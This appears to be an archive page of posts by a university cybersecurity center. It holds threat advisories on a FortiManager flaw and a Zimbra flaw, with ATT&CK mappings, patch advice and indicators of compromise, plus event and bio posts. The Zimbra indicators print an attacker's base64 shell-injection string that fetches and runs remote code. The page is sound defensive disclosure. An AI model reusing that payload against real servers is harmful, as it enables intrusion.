Sarina

About Sarina Gandy

This author has not yet filled in any details.
So far Sarina Gandy has created 114 blog entries.

Critical Vulnerability in Fortinet FortiManager Under Active Exploitation

I. Targeted Entities

  • Fortinet FortiManager Customer
  • Managed Service Providers

II. Introduction

A critical vulnerability has been identified in Fortinet’s FortiManager platform, a centralized management solution for Fortinet security products. This vulnerability, tracked as CVE-2024-47575, allows for remote code execution (RCE) by unauthorized attackers. The exploitation of this vulnerability is currently active in the wild, posing a significant threat to affected organizations. If successfully exploited, attackers could gain access to critical systems, install malicious programs, and manipulate sensitive data. Fortinet and the U.S. Cybersecurity and Infrastructure Security Agency (CISA) have issued advisories urging organizations to take immediate action by applying the latest patches to mitigate risks.

FortiManager is widely deployed across sectors, including government, telecommunications, financial services, and healthcare, making this vulnerability particularly concerning. Given the increasing sophistication of cyberattacks, unpatched systems present a high risk, allowing attackers to potentially escalate privileges and compromise network infrastructures.

III. Additional Background Information

In October 2024, a critical vulnerability was discovered in Fortinet’s FortiManager, a network management solution widely used to centrally configure and monitor Fortinet devices. This vulnerability, tracked as CVE-2024-47575, exploits a missing authentication mechanism in the fgfmd daemon, allowing attackers to execute arbitrary code remotely without valid credentials. Fortinet and CISA have confirmed that malicious actors are actively targeting both on-premises and cloud-based instances of FortiManager through specially crafted requests, leveraging this flaw to compromise network environments.

The exploit is aligned with tactics defined in the MITRE ATT&CK framework, specifically T1190 – Exploit Public-Facing Application, indicating that adversaries are using exposed FortiManager instances as initial access points. Once inside, attackers can install backdoors, modify security configurations, and delete or manipulate data, depending on the privileges of the compromised service accounts. Higher-privileged accounts can allow attackers to escalate their control leading to significant disruptions.

Previous incidents involving vulnerabilities in network appliances highlight the severity of such attacks. FortiManager’s broad adoption across multiple critical infrastructures and industries make it an attractive target. Unpatched instances are especially vulnerable to this exploit. Additionally, this vulnerability exposes connected Fortinet devices, allowing attackers to disable firewalls or VPNs and undermine network defenses.

Organizations are strongly advised to apply the latest patches immediately, perform vulnerability assessments, and monitor for indicators of compromise (IoC). Fortinet has released mitigation guidelines, emphasizing the importance of updating software, segmenting networks, and limiting administrative access to prevent further exploitation. Failure to act could result in severe operational disruptions and data breaches, particularly for critical infrastructure providers and enterprises that rely heavily on Fortinet’s security infrastructure.

IV. MITRE ATT&CK

  • T1190 – Exploit Public-Facing Application
    Attackers exploit the public-facing FortiManager application via a missing authentication flaw. This vulnerability allows unauthorized attackers to execute arbitrary code on FortiManager by sending specially crafted requests, gaining initial access to the system and enabling control over FortiGate devices connected to the network.
  • T1078 – Valid Accounts
    The threat actors leverage valid certificates on unauthorized FortiManager and FortiGate devices, allowing them to register these devices on exposed FortiManager instances. By mimicking legitimate access, the attackers avoid raising immediate security alerts and maintain a low profile for further exploitation and lateral movement within the network.
  • T1036 – Masquerading
    Attackers register rogue FortiManager devices under misleading names (e.g., “localhost”) and legitimate-seeming serial numbers (e.g., FMG-VMTM23017412). This technique helps obscure threat actor activity within FortiManager logs and console, allowing the attacker’s device to appear as if it is part of the legitimate infrastructure.
  • T1041 – Exfiltration Over C2 Channel
    Exfiltration of FortiManager and FortiGate configuration files occurs over encrypted Command and Control (C2) channels, leveraging HTTPS to avoid detection by security tools. The threat actor UNC5820 has been observed using specific IP addresses to exfiltrate compressed files containing sensitive configuration information, user credentials, and device data.
  • T1587.003 – Develop Capabilities: Digital Certificates
    Attackers leverage valid digital certificates on FortiManager and FortiGate devices to masquerade malicious activities as legitimate. With these certificates, unauthorized devices can connect to FortiManager, bypassing certain security configurations and enabling persistent access to compromised networks.
  • T1562.001 – Impair Defenses: Disable or Modify Tools
    Attackers modify FortiManager configuration to evade detection. By using commands such as fgfm-deny-unknown, attackers can prevent detection of unauthorized devices. This adjustment allows attackers to sustain their unauthorized access, mitigating the chances of detection during ongoing operations.
  • T1027 – Obfuscated Files or Information
    Attackers use gzip compression on the /tmp/.tm archive, which stores exfiltrated configuration data, to obfuscate and minimize visibility of extracted data. This technique reduces the file’s detection footprint, making it harder to identify during data exfiltration stages.
  • T1040 – Network Sniffing
    While not directly observed in this incident, the configuration data exfiltrated includes sensitive details like IPs and credentials. This could indicate an intention to use network sniffing techniques or other credential-monitoring tactics to further penetrate or maintain persistence in the target network.

V. Immediate Recommendations

  • Install Security Updates:
    • Fortinet has solved CVE-2024-47575 with fixes. To address the found security flaw and reduce the risk of active exploitation, organizations should give top priority to installing these updates on all FortiManager instances, including on-premises and cloud-based.
  • Monitor for Compromise Indicators (IoCs):
    • Check network traffic and system logs often for known IoCs linked to this attack, such as file paths, flagged IP addresses, MD5 hash values, and log entries that might point to exploitation (see to the IoCs section for references). To improve detection capabilities, incorporate these IoCs into your SIEM or IDS/IPS.
  • Establish an Incident Response Plan:
    • Create or revise an incident response plan that includes steps for handling FortiManager vulnerability exploitation. Make sure your reaction team is equipped and trained to deal with any possible Fortinet system breaches.
  • Isolate Compromised Systems:
    • Isolate compromised systems right away to stop additional access or harm if any indications of compromise are found. Notify the affected parties and carry out a comprehensive investigation, eliminating any malware or backdoors.

VI. IOCs (Indicators of Compromise)

Type Indicator
IP

45.32.41[.]202 
IP

195.85.114[.]78 
IP

104.238.141[.]143 
IP 158.247.199[.]37 
IP 45.32.63[.]2 
File /tmp/.tm 
File /var/tmp/.tm 
MD5 Hash of unreg_devices.txt  9DCFAB171580B52DEAE8703157012674 
Email address 0qsc137p[@]justdefinition.com 
Log Entry type=event,subtype=dvm,pri=information,desc=”Device,manager,generic,information,log”,user=”device,…“,msg=”Unregistered device localhost add succeeded” device=”localhost” adom=”FortiManagersession_id=0 operation=”Add device” performed_on=”localhost” changes=”Unregistered device localhost add succeeded” 
Log Entry type=event,subtype=dvm,pri=notice,desc=”Device,Manager,dvm,log,at,notice,level”,user=”System”,userfrom=”“,msg=”” adom=”root” session_id=0 operation=”Modify device” performed_on=”localhost” changes=”Edited device settings (SN FMG-VMTM23017412)” 
String revealing exploitation activity in /log/locallog/elog  msg=”Unregistered device localhost add succeeded” 
String revealing exploitation activity in /log/locallog/elog  changes=”Edited device settings (SN FMG-VMTM23017412)” 
String revealing exploitation activity in /log/locallog/elog  changes=”Added unregistered device to unregistered table. 

VII. References

The Channel CO, CRM (October 24, 2024) 5 Things To Know On The Fortinet FortiManager Attacks  https://www.crn.com/news/security/2024/5-things-to-know-on-the-fortinet-fortimanager-attacks
 

Bleeping Computer (October 23, 2024) Fortinet warns of new critical FortiManager flaw used in zero-day attacks
https://www.bleepingcomputer.com/news/security/fortinet-warns-of-new-critical-fortimanager-flaw-used-in-zero-day-attacks/ 

Google Cloud (October 23, 2024) Investigating FortiManager Zero-Day Exploitation (CVE-2024-47575) https://cloud.google.com/blog/topics/threat-intelligence/fortimanager-zero-day-exploitation-cve-2024-47575 

 New York State (October 23, 2024) A Vulnerability in Fortinet FortiManager Could Allow for Remote Code Execution https://its.ny.gov/2024-120 

 Bleeping Computer (October 24, 2024) Mandiant says new Fortinet flaw has been exploited since June https://www.bleepingcomputer.com/news/security/mandiant-says-new-fortinet-fortimanager-flaw-has-been-exploited-since-june/ 

 CVE (October 23, 2024) CVE-2024-47575 https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=CVE-2024-47575 

 Fortigaurd (October 17, 2024) Missing authentication in fgfmsd https://www.fortiguard.com/psirt/FG-IR-24-423 

 MS-ISAC (October 23, 2024) A Vulnerability in Fortinet FortiManager Could Allow for Remote Code Execution https://learn.cisecurity.org/webmail/799323/2307481671/eb748002d95238b2d31f1dc45b527f271478b2fb5b4d5ee93eb20f05d2825fce

Threat Advisory created by The Cyber Florida Security Operations Center. Contributing Security Analysts: Yousef Blassy, Uday Bilakhiya, Thiago Pagliaroni, and Kayla Walker. 

2024-11-12T12:00:23-05:00November 12, 2024|
Read More

Belonging in a Changing Cyber World: Community, Careers, and Resilience

Belonging in a Changing Cyber World: Community, Careers, and Resilience

In this episode of Do We Belong Here, Tashya Denose and Pam Lindemoen dive into the evolving landscape of the cyber industry over the past several years. They discuss the impact of the global pandemic on remote work and the shifts that have followed, the ongoing challenges between job openings and the availability of qualified candidates, and the potential long-term effects on the future of the industry and its professionals. They also share personal updates from the past few months, reminding us that with community and good friends, we always have a place where we belong.

Stream the Do We Belong Here documentary on YouTube: https://www.youtube.com/@cybersecurityfl

Follow us on social media: @DoWeBelongPod

2024-11-06T10:51:02-05:00November 7, 2024|
Read More

Zimbra Collaboration RCE Vulnerability

I. Targeted Entities

  • Small to Medium Government and Business Entities

II. Introduction

A critical remote code execution (RCE) vulnerability, tracked as CVE-2024-45519, has been discovered in Zimbra email servers, posing a significant threat to organizations relying on the platform. The vulnerability resides in Zimbra’s postjournal service, which processes incoming emails over SMTP. This vulnerability allows attackers to compromise servers by sending specially crafted emails that trigger arbitrary command execution through the server’s CC field. Once exploited, the vulnerability can be used to install web shells, providing attackers full access to the compromised server and enabling further network infiltration.

III. Additional Background Information

Zimbra Collaboration, a widely used cloud-hosted platform for email and communication services, has become a prime target for cyberattacks due to its prevalence in corporate and government environments. In September 2024, a critical vulnerability, CVE-2024-45519, was uncovered in Zimbra’s postjournal service. This flaw, caused by improper input validation, allows remote attackers to execute arbitrary commands without authentication. The vulnerability has gained increased attention following the release of a proof-of-concept (PoC) exploit, significantly raising the risk of widespread exploitation. Given Zimbra’s importance across various sectors, the exposure of this vulnerability poses a serious threat to affected systems, making it a key concern in the current cybersecurity landscape.

IV. MITRE ATT&CK

  • T1190 – Exploit Public-Facing Application
    • The attackers exploit a vulnerability in the Zimbra Collaboration Suite, a public-facing application, by sending specially crafted emails that trigger command execution on the server.
  • T1505.003 – Server Software Component: Web Shell
    • The attackers create a web shell on the compromised server by concatenating base64-encoded commands from the CC field of the emails, allowing persistent remote access.
  • T1059.004 – Command and Scripting Interpreter: Unix Shell
    • The attackers execute shell commands on the server by exploiting the input validation flaw, enabling them to control the system via the web shell.
  • T1071.001 – Application Layer Protocol: Web Protocols
    • The attackers use HTTP requests with specially crafted cookies (JSESSIONID and JACTION) to communicate with the web shell, establishing a command-and-control channel.
  • T1105 – Ingress Tool Transfer
    • Through the web shell, the attackers download and execute additional malicious code or files onto the compromised server.
  • T1132.001 – Data Encoding: Standard Encoding
    • The attackers use base64 encoding to encode malicious commands and payloads within the email CC fields and cookies to obfuscate the data and evade detection.
  • T1036.005 – Masquerading: Match Legitimate Name or Location
    • The attackers send spoofed emails that appear to come from Gmail, leveraging trusted sources to bypass initial security checks.

V. Recommendations

  • Patch Management
    • Ensure that all Zimbra email server installations, including Zimbra 9.0.0 Patch-41, Zimbra 10.0.9, and Zimbra 10.1.1 (Daffodil), are updated with the latest patches addressing CVE-2024-45519. Systems still running Zimbra 8.8.15, which has received a one-time patch past its EOL, should be prioritized for patching. Regularly monitor for new security updates and apply them as soon as they are released.
  • Monitoring and Logging
    • Implement comprehensive monitoring and logging to detect suspicious activities targeting the Zimbra postjournal service. Focus on identifying unusual email patterns, base64-encoded commands, or abnormal execution of commands through the postjournal service. Regular log reviews can help catch early signs of exploitation.
  • Access Control
    • Properly configure Zimbra’s “mynetworks” parameter to restrict access to trusted IP ranges only. If the postjournal service is not required for your organization’s operations, consider disabling it to reduce the attack surface, especially in environments where patching may be delayed
  • Service Management
    • Ensure that optional services like postjournal, which is not enabled by default, remain disabled unless explicitly needed. On systems where postjournal is unnecessary, consider removing or disabling it entirely to minimize potential vulnerabilities.
  • Vendor Communication

    • Establish regular communication with Zimbra to stay informed about the latest security advisories, patches, and best practices. Regularly check the Zimbra Security Center and set up notifications to receive updates on new vulnerabilities and security patches promptly.

VI. IOCs (Indicators of Compromise)

Type Indicator
IP Address

79.124.49[.]86
Port

10027
Base64-encoded String

ppp’echo${IFS} Li4vLj4vY29tbW9uL2Jpbi 9jdXJsIGh0dHA6LY830S 4xMjQuNDkuODY6NDQZL 3RwdnRnYmp3ZWV2dnV vbWJ5d2xrdGhsbGpkdXB 4Znlz|base64$(IFS)-di shipppppp@mail.com

VII. References

Dark Reading. (October 1, 2024). Zimbra RCE Vuln Under Attack Needs Immediate Patching. https://www.darkreading.com/cyberattacks-data-breaches/recent-zimbra-rce-under-attack-patch-now

BleepingComputer. (October 2, 2023). Critical Zimbra RCE flaw exploited to backdoor servers using emails. https://www.bleepingcomputer.com/news/security/critical-zimbra-rce-flaw-exploited-to-backdoor-servers-using-emails/

SOCRadar. (October 02, 2024). RCE Vulnerability in Zimbra (CVE-2024-45519). https://socradar.io/rce-vulnerability-in-zimbra-cve-2024-45519/

Threat Advisory created by The Cyber Florida Security Operations Center. Contributing Security Analysts: Yousef Blassy, Thiago Reis Pagliaroni, Benjamin Price

2024-10-28T11:58:24-04:00October 28, 2024|
Read More

Teaching Cybersecurity in a World of AI and Deep Fakes | Operation K12 Webinar

Join our Operation K12 team to explore Teaching Cybersecurity in a World of aI And Deep Fakes.

In this webinar, the University of Florida’s Dr. Nancy Ruzycki and Cyber Florida’s Operation K12 will explore how cyber teachers can bring in AI frameworks and tools in the cyber classroom.

This session will look at generative AI and deepfakes, and the role of cyber professionals in protecting consumers from misinformation.

Register to Join the Conversation:

2024-10-16T12:38:27-04:00October 16, 2024|
Read More

Mark Clancy

Vice President for Cybersecurity/CISO, Sprint, Inc.; Founder, Cyber Risk Management; former Managing Director for Technology Risk Management/CISO, Depository Trust and Clearing Corporation (DTCC).

2024-09-25T14:41:21-04:00September 25, 2024|
Read More

Christopher Day

VP Strategic Capabilities and Programs, Tenable. VP of Cognitive Cyber, ManTech, Member Defense Science Board, Chief Information Security Officer for Invincea, CTO for Packet Forensics, LLC and its subsidiaries; Senior Vice President, Secure Information Services for Terremark Worldwide, Inc.; and Vice President for SteelCloud. Co-founded The Asgard Group, and subsequently sold it to SteelCloud in 2004.

2024-09-25T14:42:47-04:00September 25, 2024|
Read More

Terry Roberts

Founder, President and CEO WhiteHawk CEC Inc., TASC VP for Cyber Engineering and Analytics, an Executive Director Carnegie Mellon University – Software Engineering Institute (CMU SEI), Deputy Director of Naval Intelligence CNO OPNAV, Director Requirements and Resources – Office of the Undersecretary of Defense for Intelligence.

2024-10-28T16:21:55-04:00September 25, 2024|
Read More

Andy Zolper

Andy Zolper is the Chief Operating Officer of IT and Head of Enterprise Technology Solutions for Raymond James Financial. He leads a global team of experts who deliver technology capabilities to Raymond James and its clients. Andy also chairs the firm’s Operational Risk Management Committee, and serves as the executive sponsor of the firm’s veterans inclusion network (“Valor”). Prior to his current role Andy was the Chief Information Security Officer (CISO) of Raymond James Financial for 9 years.

Over the past 30 years Andy has held numerous technology and cyber security roles with companies including UBS, JP Morgan Chase, and Verizon. He is a graduate of the Virginia Military Institute and is a proud US Marine Corps veteran. Now that their five children are grown, Andy and his wife Linda are Florida Guardians ad Litem, court-appointed volunteer advocates for children in the foster care system. Andy serves on the board of The Guardian ad Litem Foundation of Tampa Bay.

2024-10-28T16:24:34-04:00September 25, 2024|
Read More

Cybersecurity Workshop for Florida Critical Infrastructure

Join us on 29 October at the Tampa Palms Country Club for a dynamic cybersecurity workshop tailored to Florida’s critical infrastructure sectors.

This event will provide actionable recommendations for enhancing compliance with Florida Statute 282.318 and feature an overview of Cyber Florida’s no-cost solutions and services to strengthen your organization’s cyber defenses.

Participants will also engage in an exciting tabletop exercise hosted by the National Cybersecurity Preparedness Consortium (NUARI), offering hands-on experience in responding to cyber incidents. A free lunch will be provided, along with opportunities to network with cybersecurity experts and industry peers.

Don’t miss this chance to improve your cybersecurity posture and resilience!

2024-10-04T09:50:48-04:00September 16, 2024|
Read More

CONTACT US

Cyber Florida at USF
4202 E. Fowler Avenue, ISA7020
Tampa, FL 33620

Office meetings by appointment only

PRIVACY POLICY

Copyright 2024 The Florida Center for Cybersecurity at the University of South Florida. Information on this website is made available for general educational purposes only and should not be used in lieu of obtaining competent legal advice from a licensed attorney or cybersecurity professional with sufficient expertise necessary to address your specific needs. Use of this website does not create any special or fiduciary relationship between you and the Florida Center for Cybersecurity or the University of South Florida.